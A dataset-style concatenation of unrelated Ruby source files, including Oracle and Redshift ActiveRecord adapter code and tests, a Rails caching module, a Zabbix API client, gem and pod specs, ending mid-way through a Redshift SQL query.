@session_class.after_save_callback_chain.select{|cb| cb.method == :enhanced_write_lobs}.should have(1).record
end
it "should not set sessions table session_id column type as integer if emulate_integers_by_column_name is true" do
ActiveRecord::ConnectionAdapters::OracleEnhancedAdapter.emulate_integers_by_column_name = true
columns = @conn.columns('sessions')
column = columns.detect{|c| c.name == "session_id"}
column.type.should == :string
end
end
describe "OracleEnhancedAdapter ignore specified table columns" do
before(:all) do
ActiveRecord::Base.establish_connection(CONNECTION_PARAMS)
@conn = ActiveRecord::Base.connection
@conn.execute <<-SQL
CREATE TABLE test_employees (
id NUMBER,
first_name VARCHAR2(20),
last_name VARCHAR2(25),
email VARCHAR2(25),
phone_number VARCHAR2(20),
hire_date DATE,
job_id NUMBER,
salary NUMBER,
commission_pct NUMBER(2,2),
manager_id NUMBER(6),
department_id NUMBER(4,0),
created_at DATE
)
SQL
@conn.execute <<-SQL
CREATE SEQUENCE test_employees_seq MINVALUE 1
INCREMENT BY 1 START WITH 1 CACHE 20 NOORDER NOCYCLE
SQL
end
after(:all) do
@conn.execute "DROP TABLE test_employees"
@conn.execute "DROP SEQUENCE test_employees_seq"
end
after(:each) do
Object.send(:remove_const, "TestEmployee")
end
it "should ignore specified table columns" do
class ::TestEmployee < ActiveRecord::Base
ignore_table_columns :phone_number, :hire_date
end
TestEmployee.connection.columns('test_employees').select{|c| ['phone_number','hire_date'].include?(c.name) }.should be_empty
end
it "should ignore specified table columns specified in several lines" do
class ::TestEmployee < ActiveRecord::Base
ignore_table_columns :phone_number
ignore_table_columns :hire_date
end
TestEmployee.connection.columns('test_employees').select{|c| ['phone_number','hire_date'].include?(c.name) }.should be_empty
end
it "should not ignore unspecified table columns" do
class ::TestEmployee < ActiveRecord::Base
ignore_table_columns :phone_number, :hire_date
end
TestEmployee.connection.columns('test_employees').select{|c| c.name == 'email' }.should_not be_empty
end
end
describe "OracleEnhancedAdapter table and sequence creation with non-default primary key" do
before(:all) do
ActiveRecord::Base.establish_connection(CONNECTION_PARAMS)
ActiveRecord::Schema.define do
suppress_messages do
create_table :keyboards, :force => true, :id => false do |t|
t.primary_key :key_number
t.string :name
end
create_table :id_keyboards, :force => true do |t|
t.string :name
end
end
end
class ::Keyboard < ActiveRecord::Base
set_primary_key :key_number
end
class ::IdKeyboard < ActiveRecord::Base
end
end
after(:all) do
ActiveRecord::Schema.define do
suppress_messages do
drop_table :keyboards
drop_table :id_keyboards
end
end
Object.send(:remove_const, "Keyboard")
Object.send(:remove_const, "IdKeyboard")
end
it "should create sequence for non-default primary key" do
ActiveRecord::Base.connection.next_sequence_value(Keyboard.sequence_name).should_not be_nil
end
it "should create sequence for default primary key" do
ActiveRecord::Base.connection.next_sequence_value(IdKeyboard.sequence_name).should_not be_nil
end
end
describe "OracleEnhancedAdapter without composite_primary_keys" do
before(:all) do
ActiveRecord::Base.establish_connection(CONNECTION_PARAMS)
Object.send(:remove_const, 'CompositePrimaryKeys') if defined?(CompositePrimaryKeys)
class ::Employee < ActiveRecord::Base
set_primary_key :employee_id
end
end
it "should tell ActiveRecord that count distinct is supported" do
ActiveRecord::Base.connection.supports_count_distinct?.should be_true
end
it "should execute correct SQL COUNT DISTINCT statement" do
lambda { Employee.count(:employee_id, :distinct => true) }.should_not raise_error
end
end
describe "OracleEnhancedAdapter sequence creation parameters" do
before(:all) do
ActiveRecord::Base.establish_connection(CONNECTION_PARAMS)
end
def create_test_employees_table(sequence_start_value = nil)
ActiveRecord::Schema.define do
suppress_messages do
create_table :test_employees, sequence_start_value ? {:sequence_start_value => sequence_start_value} : {} do |t|
t.string :first_name
t.string :last_name
end
end
end
end
def save_default_sequence_start_value
@saved_sequence_start_value = ActiveRecord::ConnectionAdapters::OracleEnhancedAdapter.default_sequence_start_value
end
def restore_default_sequence_start_value
ActiveRecord::ConnectionAdapters::OracleEnhancedAdapter.default_sequence_start_value = @saved_sequence_start_value
end
before(:each) do
save_default_sequence_start_value
end
after(:each) do
restore_default_sequence_start_value
ActiveRecord::Schema.define do
suppress_messages do
drop_table :test_employees
end
end
Object.send(:remove_const, "TestEmployee")
end
it "should use default sequence start value 10000" do
ActiveRecord::ConnectionAdapters::OracleEnhancedAdapter.default_sequence_start_value.should == 10000
create_test_employees_table
class ::TestEmployee < ActiveRecord::Base; end
employee = TestEmployee.create!
employee.id.should == 10000
end
it "should use specified default sequence start value" do
ActiveRecord::ConnectionAdapters::OracleEnhancedAdapter.default_sequence_start_value = 1
create_test_employees_table
class ::TestEmployee < ActiveRecord::Base; end
employee = TestEmployee.create!
employee.id.should == 1
end
it "should use sequence start value from table definition" do
create_test_employees_table(10)
class ::TestEmployee < ActiveRecord::Base; end
employee = TestEmployee.create!
employee.id.should == 10
end
it "should use sequence start value and other options from table definition" do
create_test_employees_table("100 NOCACHE INCREMENT BY 10")
class ::TestEmployee < ActiveRecord::Base; end
employee = TestEmployee.create!
employee.id.should == 100
employee = TestEmployee.create!
employee.id.should == 110
end
end
describe "OracleEnhancedAdapter table and column comments" do
before(:all) do
ActiveRecord::Base.establish_connection(CONNECTION_PARAMS)
@conn = ActiveRecord::Base.connection
end
def create_test_employees_table(table_comment=nil, column_comments={})
ActiveRecord::Schema.define do
suppress_messages do
create_table :test_employees, :comment => table_comment do |t|
t.string :first_name, :comment => column_comments[:first_name]
t.string :last_name, :comment => column_comments[:last_name]
end
end
end
end
after(:each) do
ActiveRecord::Schema.define do
suppress_messages do
drop_table :test_employees
end
end
Object.send(:remove_const, "TestEmployee")
ActiveRecord::Base.table_name_prefix = nil
end
it "should create table with table comment" do
table_comment = "Test Employees"
create_test_employees_table(table_comment)
class ::TestEmployee < ActiveRecord::Base; end
@conn.table_comment("test_employees").should == table_comment
TestEmployee.table_comment.should == table_comment
end
it "should create table with columns comment" do
column_comments = {:first_name => "Given Name", :last_name => "Surname"}
create_test_employees_table(nil, column_comments)
class ::TestEmployee < ActiveRecord::Base; end
[:first_name, :last_name].each do |attr|
@conn.column_comment("test_employees", attr.to_s).should == column_comments[attr]
end
[:first_name, :last_name].each do |attr|
TestEmployee.columns_hash[attr.to_s].comment.should == column_comments[attr]
end
end
it "should create table with table and columns comment and custom table name prefix" do
ActiveRecord::Base.table_name_prefix = "xxx_"
table_comment = "Test Employees"
column_comments = {:first_name => "Given Name", :last_name => "Surname"}
create_test_employees_table(table_comment, column_comments)
class ::TestEmployee < ActiveRecord::Base; end
@conn.table_comment(TestEmployee.table_name).should == table_comment
TestEmployee.table_comment.should == table_comment
[:first_name, :last_name].each do |attr|
@conn.column_comment(TestEmployee.table_name, attr.to_s).should == column_comments[attr]
end
[:first_name, :last_name].each do |attr|
TestEmployee.columns_hash[attr.to_s].comment.should == column_comments[attr]
end
end
end
describe "OracleEnhancedAdapter column quoting" do
before(:all) do
ActiveRecord::Base.establish_connection(CONNECTION_PARAMS)
@conn = ActiveRecord::Base.connection
end
def create_test_reserved_words_table
ActiveRecord::Schema.define do
suppress_messages do
create_table :test_reserved_words do |t|
t.string :varchar2
t.integer :integer
end
end
end
end
after(:each) do
ActiveRecord::Schema.define do
suppress_messages do
drop_table :test_reserved_words
end
end
Object.send(:remove_const, "TestReservedWord")
ActiveRecord::Base.table_name_prefix = nil
end
it "should allow creation of a table with oracle reserved words as column names" do
create_test_reserved_words_table
class ::TestReservedWord < ActiveRecord::Base; end
[:varchar2, :integer].each do |attr|
TestReservedWord.columns_hash[attr.to_s].name.should == attr.to_s
end
end
end
describe "OracleEnhancedAdapter valid table names" do
before(:all) do
@adapter = ActiveRecord::ConnectionAdapters::OracleEnhancedAdapter
end
it "should be valid with letters and digits" do
@adapter.valid_table_name?("abc_123").should be_true
end
it "should be valid with schema name" do
@adapter.valid_table_name?("abc_123.def_456").should be_true
end
it "should be valid with $ in name" do
@adapter.valid_table_name?("sys.v$session").should be_true
end
it "should not be valid with two dots in name" do
@adapter.valid_table_name?("abc_123.def_456.ghi_789").should be_false
end
it "should not be valid with invalid characters" do
@adapter.valid_table_name?("warehouse-things").should be_false
end
end
describe "OracleEnhancedAdapter table quoting" do
before(:all) do
ActiveRecord::Base.establish_connection(CONNECTION_PARAMS)
@conn = ActiveRecord::Base.connection
end
def create_warehouse_things_table
ActiveRecord::Schema.define do
suppress_messages do
create_table "warehouse-things" do |t|
t.string :name
t.integer :foo
end
end
end
end
after(:each) do
ActiveRecord::Schema.define do
suppress_messages do
drop_table "warehouse-things"
end
end
Object.send(:remove_const, "WarehouseThing")
ActiveRecord::Base.table_name_prefix = nil
end
it "should allow creation of a table with non alphanumeric characters" do
create_warehouse_things_table
class ::WarehouseThing < ActiveRecord::Base
set_table_name "warehouse-things"
end
wh = WarehouseThing.create!(:name => "Foo", :foo => 2)
wh.id.should_not be_nil
end
end
| 32.144404 | 128 | 0.716981 |
ff52567a0f9b90d2e15ff119842c963bc08064ad | 1,650 | require 'test_helper'
class UsersEditTest < ActionDispatch::IntegrationTest
def setup
@user = users(:morna)
end
test "unsuccessful edit" do
log_in_as(@user)
get edit_user_path(@user)
assert_template 'users/edit'
patch user_path(@user), params: { user: { name: "blah",
email: "foo@invalid",
password: "foo",
password_confirmation: "bar" } }
assert_template 'users/edit'
end
test "sucessful edit with friendly forwarding" do
get edit_user_path(@user)
log_in_as(@user)
assert_redirected_to edit_user_url(@user)
assert session[:forwarding_url].blank?
name = "Foo Bar"
email = "[email protected]"
#password = "foobar"
patch user_path(@user), params: { user: { name: name,
email: email,
password: "",
password_confirmation: "" } }
assert_not flash.empty?
assert_redirected_to @user
@user.reload
assert_equal name, @user.name
assert_equal email, @user.email
end
test "should redirect edit when not logged in" do
get edit_user_path(@user)
assert_not flash.empty?
assert_redirected_to login_url
end
test "should redirect update when not logged in" do
patch user_path(@user), params: { user: { name: @user.name,
email: @user.email } }
assert_not flash.empty?
assert_redirected_to login_url
end
end | 31.730769 | 78 | 0.550909 |
bfb6a33ebdbecdf813051de7e8095b14fb8aa67b | 156 | # frozen_string_literal: true
class AddIncomeToPeople < ActiveRecord::Migration[6.0]
def change
add_column :people, :income_level, :string
end
end
| 19.5 | 54 | 0.762821 |
7977e387301bcf99febb5bb808d6168937532e92 | 118 | if Rails.env.development? || Rails.env.test?
require 'rspec/core/rake_task'
RSpec::Core::RakeTask.new(:spec)
end
| 19.666667 | 44 | 0.720339 |
1ad4e0ec10a80b02299d5cfae0b392f7377837f5 | 1,163 | # Copyright, 2017, by Samuel G. D. Williams. <http://www.codeotaku.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
require "geospatial/kml/version"
| 52.863636 | 79 | 0.77644 |
abf23b88c843ec7cc269a9a339875eafe8c49c90 | 4,548 | module Cache
module Cacheable
include ResponseWrapper
# thin wrapper around Rails.cache.fetch. Reads the value of key from cache if it exists, otherwise executes
# the passed block and caches the result. Set force_write=true to make it always execute the block and write
# to the cache.
def fetch_from_cache(id=nil, force_write=false)
key = cache_key id
expiration = self.expires_in
Rails.logger.debug "#{self.name} cache_key will be #{key}, expiration #{expiration}, forced: #{force_write}"
value = Rails.cache.fetch(
key,
:expires_in => expiration,
:force => force_write
) do
if block_given?
response = yield
response = process_response_before_caching(response, {id: id, force_write: force_write})
cached_entry = response.nil? ? NilClass : response
cached_entry
end
end
(value == NilClass) ? nil : value
end
# reads from cache if possible, otherwise executes the passed block and caches the result.
# if the passed block throws an exception, it will be logged, and the result will be cached for a much shorter time.
# WARNING: Do not use "return foo" inside the passed block or you will short-circuit the flow
# and nothing will be cached.
def smart_fetch_from_cache(opts={}, &block)
id = opts[:id]
key = cache_key id
force_write = opts[:force_write]
expiration = self.expires_in
Rails.logger.debug "#{self.name} cache_key will be #{key}, expiration #{expiration}"
unless force_write
entry = Rails.cache.read key
if entry
Rails.logger.debug "#{self.name} Entry is already in cache: #{key}"
return (entry == NilClass) ? nil : entry
end
end
wrapped_response = handling_exceptions(key, opts, &block)
response = wrapped_response[:response]
if wrapped_response[:exception]
Rails.logger.debug "#{self.name} Error occurred; writing entry to cache with short lifespan: #{key}"
expiration = Settings.cache.expiration.failure
else
Rails.logger.debug "#{self.name} Writing entry to cache: #{key}"
end
response = process_response_before_caching(response, opts)
cached_entry = (response.nil?) ? NilClass : response
Rails.cache.write(key,
cached_entry,
:expires_in => expiration,
:force => true)
response
end
# Override to cache JSON, decorate the response with metadata, etc.
def process_response_before_caching(response, opts)
response
end
def in_cache?(id = nil)
key = cache_key id
Rails.cache.exist? key
end
def expires_in(expires_key = nil)
expires_key ||= self.name
expirations = Settings.cache.expiration.marshal_dump
expiration_config = expirations[expires_key.to_sym] || expirations[:default]
begin
exp = parse_expiration_setting(expiration_config)
if exp.blank? || exp == 0
raise ArgumentError, 'No expiration'
else
[exp, Settings.cache.maximum_expires_in].min
end
rescue ArgumentError => e
logger.error "Cache expiration configured as #{expiration_config}; resetting to default #{expirations[:default]}. #{e.class}: #{e.message}\n #{e.backtrace.join "\n "}"
expirations[:default]
end
end
def parse_expiration_setting(exp)
if exp.is_a?(String) && (parsed = /NEXT_(?<hour>\d+)_(?<minute>\d+)/.match(exp))
hour = parsed[:hour]
next_time = Time.zone.today.in_time_zone.to_datetime.advance(hours: parsed[:hour].to_i,
minutes: parsed[:minute].to_i)
now = Time.zone.now.to_i
if now >= next_time.to_i
next_time = next_time.advance(days: 1)
end
next_time.to_i - now
else
exp
end
end
def bearfacts_derived_expiration
# Bearfacts data is refreshed daily at 0730, so we will always expire at 0800 sharp on the day after today.
parse_expiration_setting('NEXT_08_00')
end
def expire(id = nil)
key = cache_key id
Rails.cache.delete(key)
Rails.logger.debug "Expired cache_key #{key}"
end
def cache_key(id = nil)
id.nil? ? self.name : "#{self.name}/#{id}"
end
def write_cache(value, id = nil)
Rails.cache.write(cache_key(id),
value,
:expires_in => self.expires_in,
:force => true)
end
end
end
| 35.255814 | 175 | 0.636324 |
7a7c3e1704c9f926c6980d06bcc62bc28d64ad49 | 623 | require 'test_helper'
class UsersProfileTest < ActionDispatch::IntegrationTest
include ApplicationHelper
def setup
@user = users(:michael)
end
test "profile display" do
log_in_as(@user)
get user_path(@user)
assert_template 'users/show'
assert_select 'title', full_title(@user.name)
assert_select 'h1', text: @user.name
assert_select 'h1>img.gravatar'
assert_match @user.microposts.count.to_s, response.body
assert_select 'div.pagination', count: 1
@user.microposts.paginate(page: 1).each do |micropost|
assert_match micropost.content, response.body
end
end
end | 27.086957 | 59 | 0.723917 |
b92098b7a383bcd8aa50455fb2d9b869f4a6ca7a | 1,882 | include QuadiconHelper
describe "layouts/listnav/_security_group.html.haml" do
before :each do
set_controller_for_view("security_group")
assign(:panels, "ems_prop" => true, "ems_rel" => true)
allow(view).to receive(:truncate_length).and_return(15)
allow(view).to receive(:role_allows).and_return(true)
end
["openstack"].each do |t|
before :each do
allow_any_instance_of(User).to receive(:get_timezone).and_return(Time.zone)
provider = FactoryGirl.create("ems_#{t}".to_sym)
@security_group = FactoryGirl.create("security_group_#{t}".to_sym,
:ext_management_system => provider.network_manager,
:name => 'A test')
vm = FactoryGirl.create("vm_#{t}".to_sym)
network = FactoryGirl.create("cloud_network_#{t}".to_sym)
subnet = FactoryGirl.create("cloud_subnet_#{t}".to_sym, :cloud_network => network)
vm.network_ports << network_port = FactoryGirl.create("network_port_#{t}".to_sym,
:device => vm,
:security_groups => [@security_group])
FactoryGirl.create(:cloud_subnet_network_port, :cloud_subnet => subnet, :network_port => network_port)
end
context "for #{t}" do
it "relationships links uses restful path in #{t.camelize}" do
@record = @security_group
render
expect(response).to include("Show this Security Group's parent Network Provider\" href=\"/ems_network/show/#{@record.ext_management_system.id}\">")
expect(response).to include("Show all Instances\" onclick=\"return miqCheckForChanges()\" href=\"/security_group/show/#{@record.id}?display=instances\">")
end
end
end
end
| 50.864865 | 162 | 0.602019 |
396b71c36e1795567aeb9491879eb2b37f064aaa | 4,285 | require 'net/http'
require 'json'
require 'openssl'
class ZabbixApi
class Client
# @param (see ZabbixApi::Client#initialize)
# @return [Hash]
attr_reader :options
# @return [Integer]
def id
rand(100_000)
end
# Returns the API version from the Zabbix Server
#
# @return [String]
def api_version
@api_version ||= api_request(method: 'apiinfo.version', params: {})
end
# Log in to the Zabbix Server and generate an auth token using the API
#
# @return [Hash]
def auth
api_request(
method: 'user.login',
params: {
user: @options[:user],
password: @options[:password]
}
)
end
# Initializes a new Client object
#
# @param options [Hash]
# @option opts [String] :url The url of zabbixapi(example: 'http://localhost/zabbix/api_jsonrpc.php')
# @option opts [String] :user
# @option opts [String] :password
# @option opts [String] :http_user A user for basic auth.(optional)
# @option opts [String] :http_password A password for basic auth.(optional)
# @option opts [Integer] :timeout Set timeout for requests in seconds.(default: 60)
#
# @return [ZabbixApi::Client]
def initialize(options = {})
@options = options
if !ENV['http_proxy'].nil? && options[:no_proxy] != true
@proxy_uri = URI.parse(ENV['http_proxy'])
@proxy_host = @proxy_uri.host
@proxy_port = @proxy_uri.port
@proxy_user, @proxy_pass = @proxy_uri.userinfo.split(/:/) if @proxy_uri.userinfo
end
unless api_version =~ %r{^4.[0|2]\.\d+$}
#log "[WARN] Zabbix API version: #{api_version} is not supported by this version of zabbixapi"
end
@auth_hash = auth
end
# Convert message body to JSON string for the Zabbix API
#
# @param body [Hash]
# @return [String]
def message_json(body)
message = {
method: body[:method],
params: body[:params],
id: id,
jsonrpc: '2.0'
}
message[:auth] = @auth_hash unless body[:method] == 'apiinfo.version' || body[:method] == 'user.login'
JSON.generate(message)
end
# @param body [String]
# @return [String]
def http_request(body)
uri = URI.parse(@options[:url])
# set the time out the default (60) or to what the user passed
timeout = @options[:timeout].nil? ? 60 : @options[:timeout]
puts "[DEBUG] Timeout for request set to #{timeout} seconds" if @options[:debug]
http =
if @proxy_uri
Net::HTTP.Proxy(@proxy_host, @proxy_port, @proxy_user, @proxy_pass).new(uri.host, uri.port)
else
Net::HTTP.new(uri.host, uri.port)
end
if uri.scheme == 'https'
http.use_ssl = true
http.verify_mode = OpenSSL::SSL::VERIFY_NONE
end
http.open_timeout = timeout
http.read_timeout = timeout
request = Net::HTTP::Post.new(uri.request_uri)
request.basic_auth @options[:http_user], @options[:http_password] if @options[:http_user]
request.add_field('Content-Type', 'application/json-rpc')
request.body = body
response = http.request(request)
raise HttpError.new("HTTP Error: #{response.code} on #{@options[:url]}", response) unless response.code == '200'
puts "[DEBUG] Get answer: #{response.body}" if @options[:debug]
response.body
end
# @param body [String]
# @return [Hash, String]
def _request(body)
puts "[DEBUG] Send request: #{body}" if @options[:debug]
result = JSON.parse(http_request(body))
raise ApiError.new("Server answer API error\n #{JSON.pretty_unparse(result['error'])}\n on request:\n #{pretty_body(body)}", result) if result['error']
result['result']
end
def pretty_body(body)
parsed_body = JSON.parse(body)
# If password is in body hide it
parsed_body['params']['password'] = '***' if parsed_body['params'].is_a?(Hash) && parsed_body['params'].key?('password')
JSON.pretty_unparse(parsed_body)
end
# Execute Zabbix API requests and return response
#
# @param body [Hash]
# @return [Hash, String]
def api_request(body)
_request message_json(body)
end
end
end
| 29.756944 | 157 | 0.616569 |
8793a0fb3e7c41fa39f9deb609bd8b83344c3747 | 1,299 | lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require_relative 'lib/learnosity_utils/version'
Gem::Specification.new do |spec|
spec.name = 'learnosity_utils'
spec.version = LearnosityUtils::VERSION
spec.authors = ['Chris Connell']
spec.email = ['[email protected]']
spec.summary = 'An easy interface to learnosity endpoints with configuration support'
spec.homepage = 'https://github.com/LYNx785/learnosity_utils'
spec.license = 'MIT'
# The `git ls-files -z` loads the files in the RubyGem that have been added into git.
spec.files = Dir.chdir(File.expand_path('..', __FILE__)) do
`git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
end
spec.bindir = 'exe'
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ['lib']
spec.required_ruby_version = '~>2.5'
spec.add_development_dependency 'bundler', '~>2.0'
spec.add_development_dependency 'rake', '~>12.3'
spec.add_development_dependency 'rspec', '~>3.8'
spec.add_development_dependency 'webmock', '~>3.5'
spec.add_runtime_dependency 'learnosity-sdk', '0.1.0'
spec.add_runtime_dependency 'rare', '~>0.1.1'
end
| 38.205882 | 93 | 0.672825 |
edf22add8f710480be4a06942666c513bd09832b | 560 | require 'net/ssh'
module AmiSpec
class WaitForRC
def self.wait(ip_address, user, key)
Net::SSH.start(ip_address, user, keys: [key], paranoid: false) do |ssh|
# Wait for SystemV to start
# This only works for Ubuntu with upstart.
# Detecting OS and Release will need something like this
# https://github.com/mizzy/specinfra/blob/master/lib/specinfra/helper/detect_os/debian.rb
ssh.exec 'while /usr/sbin/service rc status | grep -q "^rc start/running, process"; do sleep 1; done'
end
end
end
end
| 32.941176 | 109 | 0.669643 |
e8cc878c41e2a418920686d39d93afc5165745ec | 534 | # frozen_string_literal: true
require "yaframework"
app = Yaframework::Application
app.get "/" do
response.redirect "/html"
end
app.get "/html" do
response.html "This is <b>HTML</b>, where you cat use some <small>tags</small>.
<br/>JSON <a href=\"/json\">here</a>,
<br/>Plain text <a href=\"/text\">here</a>"
end
app.get "/text" do
response.text "Just plain text.<br/>Boring, even tags don't work..."
end
app.get "/json" do
response.json "{ \"The awesomeness of this framework\": \"100/100\" }"
end
app.listen(4567)
| 21.36 | 81 | 0.662921 |
5dfff5cd949992a5b631fce360a2ad3631f8bab0 | 962 | #
# Be sure to run `pod spec lint WZJBaseViewController.podspec' to ensure this is a
# valid spec and to remove all comments including this before submitting the spec.
#
# To learn more about Podspec attributes see https://docs.cocoapods.org/specification.html
# To see working Podspecs in the CocoaPods repo see https://github.com/CocoaPods/Specs/
#
Pod::Spec.new do |spec|
spec.name = "ZJPod"
spec.version = "1.2.7"
spec.summary = "Base Class "
spec.description = <<-DESC
BaseViewController
DESC
spec.homepage = "https://github.com/vstx143/ZJPod"
spec.license = "MIT"
spec.author = { "vstx143" => "[email protected]" }
spec.platform = :ios, "8.0"
spec.source = { :git => "https://github.com/vstx143/ZJPod.git", :tag => "#{spec.version}" }
spec.source_files = 'ZJPod','**/*.{h,m}'
spec.requires_arc = true
spec.dependency "DZNEmptyDataSet"
spec.dependency "MJRefresh"
spec.dependency "AFNetworking"
end
| 32.066667 | 97 | 0.685031 |
1df670c1b4170eaeaba296db8c8de93b694b4bf5 | 16,524 | module ActiveRecord
module ConnectionAdapters
module Redshift
class SchemaCreation < SchemaCreation
private
def visit_ColumnDefinition(o)
o.sql_type = type_to_sql(o.type, limit: o.limit, precision: o.precision, scale: o.scale)
super
end
def add_column_options!(sql, options)
column = options.fetch(:column) { return super }
if column.type == :uuid && options[:default] =~ /\(\)/
sql << " DEFAULT #{options[:default]}"
else
super
end
end
end
module SchemaStatements
# Drops the database specified on the +name+ attribute
# and creates it again using the provided +options+.
def recreate_database(name, options = {}) #:nodoc:
drop_database(name)
create_database(name, options)
end
# Create a new Redshift database. Options include <tt>:owner</tt>, <tt>:template</tt>,
# <tt>:encoding</tt> (defaults to utf8), <tt>:collation</tt>, <tt>:ctype</tt>,
# <tt>:tablespace</tt>, and <tt>:connection_limit</tt> (note that MySQL uses
# <tt>:charset</tt> while Redshift uses <tt>:encoding</tt>).
#
# Example:
# create_database config[:database], config
# create_database 'foo_development', encoding: 'unicode'
def create_database(name, options = {})
options = { encoding: 'utf8' }.merge!(options.symbolize_keys)
option_string = options.inject("") do |memo, (key, value)|
memo += case key
when :owner
" OWNER = \"#{value}\""
else
""
end
end
execute "CREATE DATABASE #{quote_table_name(name)}#{option_string}"
end
# Drops a Redshift database.
#
# Example:
# drop_database 'matt_development'
def drop_database(name) #:nodoc:
execute "DROP DATABASE #{quote_table_name(name)}"
end
# Returns the list of all tables in the schema search path or a specified schema.
def tables(name = nil)
if name
ActiveSupport::Deprecation.warn(<<-MSG.squish)
Passing arguments to #tables is deprecated without replacement.
MSG
end
select_values("SELECT tablename FROM pg_tables WHERE schemaname = ANY(current_schemas(false))", 'SCHEMA')
end
def data_sources # :nodoc
select_values(<<-SQL, 'SCHEMA')
SELECT c.relname
FROM pg_class c
LEFT JOIN pg_namespace n ON n.oid = c.relnamespace
WHERE c.relkind IN ('r', 'v','m') -- (r)elation/table, (v)iew, (m)aterialized view
AND n.nspname = ANY (current_schemas(false))
SQL
end
# Returns true if table exists.
# If the schema is not specified as part of +name+ then it will only find tables within
# the current schema search path (regardless of permissions to access tables in other schemas)
def table_exists?(name)
ActiveSupport::Deprecation.warn(<<-MSG.squish)
#table_exists? currently checks both tables and views.
This behavior is deprecated and will be changed with Rails 5.1 to only check tables.
Use #data_source_exists? instead.
MSG
data_source_exists?(name)
end
def data_source_exists?(name)
name = Utils.extract_schema_qualified_name(name.to_s)
return false unless name.identifier
select_value(<<-SQL, 'SCHEMA').to_i > 0
SELECT COUNT(*)
FROM pg_class c
LEFT JOIN pg_namespace n ON n.oid = c.relnamespace
WHERE c.relkind IN ('r','v','m') -- (r)elation/table, (v)iew, (m)aterialized view
AND c.relname = '#{name.identifier}'
AND n.nspname = #{name.schema ? "'#{name.schema}'" : 'ANY (current_schemas(false))'}
SQL
end
def views # :nodoc:
select_values(<<-SQL, 'SCHEMA')
SELECT c.relname
FROM pg_class c
LEFT JOIN pg_namespace n ON n.oid = c.relnamespace
WHERE c.relkind IN ('v','m') -- (v)iew, (m)aterialized view
AND n.nspname = ANY (current_schemas(false))
SQL
end
def view_exists?(view_name) # :nodoc:
name = Utils.extract_schema_qualified_name(view_name.to_s)
return false unless name.identifier
select_values(<<-SQL, 'SCHEMA').any?
SELECT c.relname
FROM pg_class c
LEFT JOIN pg_namespace n ON n.oid = c.relnamespace
WHERE c.relkind IN ('v','m') -- (v)iew, (m)aterialized view
AND c.relname = '#{name.identifier}'
AND n.nspname = #{name.schema ? "'#{name.schema}'" : 'ANY (current_schemas(false))'}
SQL
end
def drop_table(table_name, options = {})
execute "DROP TABLE #{quote_table_name(table_name)}#{' CASCADE' if options[:force] == :cascade}"
end
# Returns true if schema exists.
def schema_exists?(name)
select_value("SELECT COUNT(*) FROM pg_namespace WHERE nspname = '#{name}'", 'SCHEMA').to_i > 0
end
def index_name_exists?(table_name, index_name, default)
false
end
# Returns an array of indexes for the given table.
def indexes(table_name, name = nil)
[]
end
# Returns the list of all column definitions for a table.
def columns(table_name)
column_definitions(table_name.to_s).map do |column_name, type, default, notnull, oid, fmod|
default_value = extract_value_from_default(default)
type_metadata = fetch_type_metadata(column_name, type, oid, fmod)
default_function = extract_default_function(default_value, default)
new_column(column_name, default_value, type_metadata, notnull == 'f', table_name, default_function)
end
end
def new_column(name, default, sql_type_metadata = nil, null = true, table_name = nil, default_function = nil) # :nodoc:
RedshiftColumn.new(name, default, sql_type_metadata, null, default_function)
end
# Returns the current database name.
def current_database
select_value('select current_database()', 'SCHEMA')
end
# Returns the current schema name.
def current_schema
select_value('SELECT current_schema', 'SCHEMA')
end
# Returns the current database encoding format.
def encoding
select_value("SELECT pg_encoding_to_char(encoding) FROM pg_database WHERE datname LIKE '#{current_database}'", 'SCHEMA')
end
def collation
end
def ctype
end
# Returns an array of schema names.
def schema_names
select_value(<<-SQL, 'SCHEMA')
SELECT nspname
FROM pg_namespace
WHERE nspname !~ '^pg_.*'
AND nspname NOT IN ('information_schema')
ORDER by nspname;
SQL
end
# Creates a schema for the given schema name.
def create_schema schema_name
execute "CREATE SCHEMA #{quote_schema_name(schema_name)}"
end
# Drops the schema for the given schema name.
def drop_schema(schema_name, options = {})
execute "DROP SCHEMA#{' IF EXISTS' if options[:if_exists]} #{quote_schema_name(schema_name)} CASCADE"
end
# Sets the schema search path to a string of comma-separated schema names.
# Names beginning with $ have to be quoted (e.g. $user => '$user').
# See: http://www.postgresql.org/docs/current/static/ddl-schemas.html
#
# This should be not be called manually but set in database.yml.
def schema_search_path=(schema_csv)
if schema_csv
execute("SET search_path TO #{schema_csv}", 'SCHEMA')
@schema_search_path = schema_csv
end
end
# Returns the active schema search path.
def schema_search_path
@schema_search_path ||= select_value('SHOW search_path', 'SCHEMA')
end
# Returns the sequence name for a table's primary key or some other specified key.
def default_sequence_name(table_name, pk = nil) #:nodoc:
result = serial_sequence(table_name, pk || 'id')
return nil unless result
Utils.extract_schema_qualified_name(result).to_s
rescue ActiveRecord::StatementInvalid
Redshift::Name.new(nil, "#{table_name}_#{pk || 'id'}_seq").to_s
end
def serial_sequence(table, column)
select_value("SELECT pg_get_serial_sequence('#{table}', '#{column}')", 'SCHEMA')
end
def set_pk_sequence!(table, value) #:nodoc:
end
def reset_pk_sequence!(table, pk = nil, sequence = nil) #:nodoc:
end
def pk_and_sequence_for(table) #:nodoc:
[nil, nil]
end
# Returns just a table's primary key
def primary_keys(table)
pks = query(<<-end_sql, 'SCHEMA')
SELECT DISTINCT attr.attname
FROM pg_attribute attr
